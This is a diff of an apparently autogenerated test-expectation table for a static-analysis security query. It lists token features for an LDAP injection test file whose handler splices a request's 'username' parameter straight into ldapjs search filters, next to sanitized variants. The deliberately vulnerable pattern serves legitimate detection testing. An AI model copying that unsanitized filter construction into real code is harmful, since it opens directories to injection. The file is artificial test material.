| {\\n ... } | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 | {\\n ... } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:54:26:57:7 | {\\n ... } | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:17 | attribute | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:17 | attribute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:17 | attribute | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:17 | attribute | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:17 | attribute | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:9:55:29 | attribu ... ername" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | CalleeFlexibleAccessPath | EqualityFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | InputAccessPathFromCallee | ?.attribute | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | assignedToPropName | attribute | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:55:20:55:29 | "username" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:13 | value | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:13 | value | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:13 | value | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:13 | value | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:13 | value | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:9:56:23 | value: username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | CalleeFlexibleAccessPath | EqualityFilter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | InputAccessPathFromCallee | ?.value | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | assignedToPropName | value | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:56:16:56:23 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:8 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:8 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:8 | client | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:8 | client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:8 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:15 | client.search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:15 | client.search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:15 | client.search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:15 | client.search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:15 | client.search | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | client. ... es) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | client. ... es) {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | client. ... es) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | client. ... es) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | client. ... es) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | exceptional return of client. ... es) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | exceptional return of client. ... es) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | exceptional return of client. ... es) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | exceptional return of client. ... es) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:3:61:67 | exceptional return of client. ... es) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:10:61:15 | search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:10:61:15 | search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:10:61:15 | search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:10:61:15 | search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:10:61:15 | search | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:17:61:27 | "o=example" | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:17:61:27 | "o=example" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:17:61:27 | "o=example" | calleeImports | ldapjs | @@ -1109,6 +6086,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:30:61:42 | { filter: f } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:30:61:42 | { filter: f } | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:30:61:42 | { filter: f } | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:37 | filter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:37 | filter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:37 | filter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:37 | filter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:37 | filter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:32:61:40 | filter: f | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:40:61:40 | f | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:40:61:40 | f | InputAccessPathFromCallee | 1.filter | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:40:61:40 | f | InputArgumentIndex | 1 | @@ -1119,6 +6111,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:40:61:40 | f | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:40:61:40 | f | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:40:61:40 | f | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:44 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:44 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:44 | this | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:44 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:44 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | 'arguments' object of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | exceptional return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | exceptional return of anonymous function | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | functio ... res) {} | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | functio ... res) {} | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | functio ... res) {} | calleeImports | ldapjs | @@ -1128,6 +6135,61 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | functio ... res) {} | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | functio ... res) {} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | functio ... res) {} | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | return of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:45:61:66 | return of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:55:61:57 | err | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:55:61:57 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:55:61:57 | err | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:55:61:57 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:55:61:57 | err | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:60:61:62 | res | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:60:61:62 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:60:61:62 | res | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:60:61:62 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:61:60:61:62 | res | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:63:20 | parsedFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:63:20 | parsedFilter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:63:20 | parsedFilter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:63:20 | parsedFilter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:63:20 | parsedFilter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedF ... ))`\\n ) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedF ... ))`\\n ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedF ... ))`\\n ) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedF ... ))`\\n ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedF ... ))`\\n ) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedFilter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:63:9:65:3 | parsedFilter | contextSurroundingFunctionParameters | | +| 